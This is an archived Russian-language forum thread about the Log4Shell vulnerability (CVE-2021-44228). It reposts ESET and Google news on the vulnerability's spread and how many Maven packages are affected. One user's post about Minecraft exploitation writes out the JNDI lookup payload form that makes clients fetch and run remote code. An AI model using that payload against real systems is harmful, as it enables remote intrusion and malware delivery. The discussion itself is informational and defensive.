PDA

Просмотр полной версии : Критическая уязвимость Log4Shell, что это такое?


alexzir
16.12.2021, 11:39
Что такое Log4Shell?

Уязвимость Log4Shell с начала декабря 2021 поставила весь мир на уши и использовалась уже в сотнях тысяч атак. Log4Shell предоставляет злоумышленникам удаленный доступ к миллионам устройств в интернете, на которых работает Java и установлена утилита Log4j.

Из-за разрушительного воздействия и широкого распространения Log4Shell присвоен

индекс опасности 10 из 10.

Чем опасен новый эксплойт?

Log4Shell относится к уязвимостям удаленного выполнения кода (RCE) и позволяет злоумышленнику запускать код на чужих серверах в системах, которые даже не подключены к интернету.

Самое страшное, что для взлома крупных корпораций специальных хакерских навыков не требуется — Log4Shell делает возможной атаку даже на очень защищённые облачные сервисы.

География интенсивности атак

Аналитики ESET изучили географию эксплуатации уязвимости Log4Shell. Лидерами антирейтинга стали США, Великобритания, Турция, Германия и Нидерланды. В России критического всплеска сканирований на предмет наличия уязвимости пока не зафиксировано.

Меры, принятые в ESET

С 11 декабря 2021 года модуль защиты от сетевых атак ESET дополнен функцией обнаружения новой уязвимости. Теперь злоумышленники, предпринимающие попытки воспользоваться уязвимостью, будут заблокированы.

https://resize.yandex.net/mailservice?url=https%3A%2F%2Fl.esetnod32.ru%2Fcus tloads%2F817335087%2Fmd_601860.png&proxy=yes&key=9da848b0b3ee217859fd16dcf413d2b6

Источник: рассылка от Eset

Turanchocks_
16.12.2021, 11:56
То чувство, когда ненужный антивирус - вдруг нужный.

Skofield
16.12.2021, 13:02
https://raw.githubusercontent.com/YfryTchsGD/Log4jAttackSurface/master/MEME/6.jpg

Даже гугл похекан https://github.com/YfryTchsGD/Log4jAttackSurface

alexzir
20.12.2021, 17:47
Команда Google просканировала крупнейший на сегодняшний день репозиторий Java-пакетов — Maven Central и пришла к выводу, что 35 863 пакета используют уязвимые версии библиотеки Apache Log4j. Таким образом, масштабы бреши Log4Shell продолжают удивлять экспертов.

https://www.safezone.cc/attachments/1639989180164-png.60242/

Среди пакетов с проблемными версиями Log4j есть и те, что уязвимы перед самым первым эксплойтом для CVE-2021-44228 (Log4Shell). Однако часть пакетов страдает от второй выявленной бреши — CVE-2021-45046, приводящей к удалённому выполнению кода.

В отчёте команды Google Open Source Insights специалисты указывают на тот факт, что обычно серьёзная Java-уязвимость затрагивает лишь 2% пакетов в Maven Central. Судя по всему, с Log4Shell дела обстоят куда хуже, ведь 35 тыс. пакетов составляют около 8% от коллекции Maven Central.

Джейм Уэттер и Ники Рингленд из команды Google ещё раз подчеркнули важность обновить уязвимые пакеты и использовать пропатченную версию библиотеки, однако сами специалисты считают, что патчинг в отдельных случаях будет происходить годами, а рассчитывать на полное устранение брешей пакетов в Maven Central просто наивно.

Проблема в том, что Log4j не всегда включена в пакет как прямая зависимость, она также может быть зависимостью другой зависимости. В этом случае разработчики уязвимых пакетов должны ждать обновлений от других девелоперов, а этот процесс может затянуться.

https://www.safezone.cc/attachments/1639989039905-png.60241/

Источник: Google: Более 35 000 Java-пакетов уязвимы перед Log4Shell (https://www.anti-malware.ru/news/2021-12-20-111332/37785)

https://www.safezone.cc/threads/goo...v-ujazvimy-pered-log4shell.40162/#post-307664 (https://www.safezone.cc/threads/google-bolee-35-000-java-paketov-ujazvimy-pered-log4shell.40162/#post-307664)

begin_end
22.12.2021, 18:39
Удивительно, что у нас (на Античате) этим никто не занялся глубже. Уязвимость действительно серьезная, масштабная и полезная. Самый простой пример применения, не гипотетически, а реально затронувший немалую аудиторию - эксплуатация в игре Minecraft.

Я несколько лет содержу один сервер, сейчас малопопулярный. Но в день распространения информации об уязвимости (еще до выхода патча) по серверам уже прошлись шалуны, тестеры и разного рода хэккеры. В том числе и ко мне заглядывали, подсадив некоторым игрокам зловредов (признавайтесь, чей хост michael.klimenko.spb.ru? ).

Под Minecraftуязвимость сквозная, произвольный код легче запустить у клиента, чем на сервере (в моем случае сервер слишком специфичен и его не затронули). Сама эксплуатация наипростейшая: заход в игру и ввод в чат текстового сообщения вида ${jndi:ldap://script_url}, где script_url - это веб-адрес расположения вредоносного скрипта. У игроков, которые увидели сообщение игровой клиент сам загрузит и выполнит код.

На данный момент >95% серверов и игровых клиентов пропатчены, а в первые дни десятки тысяч игроков в одном только RU-Minecraft подверглись успешным атакам.

Фикс (https://www.spigotmc.org/resources/log4jexploit-fix.98243/) под Minecraft(spigot).

Видео, подробно расписывающее уязвимость для Minecraft (EN):



UPD.: расписанный пример эксплуатации (https://habr.com/ru/post/597981/) в web (RU).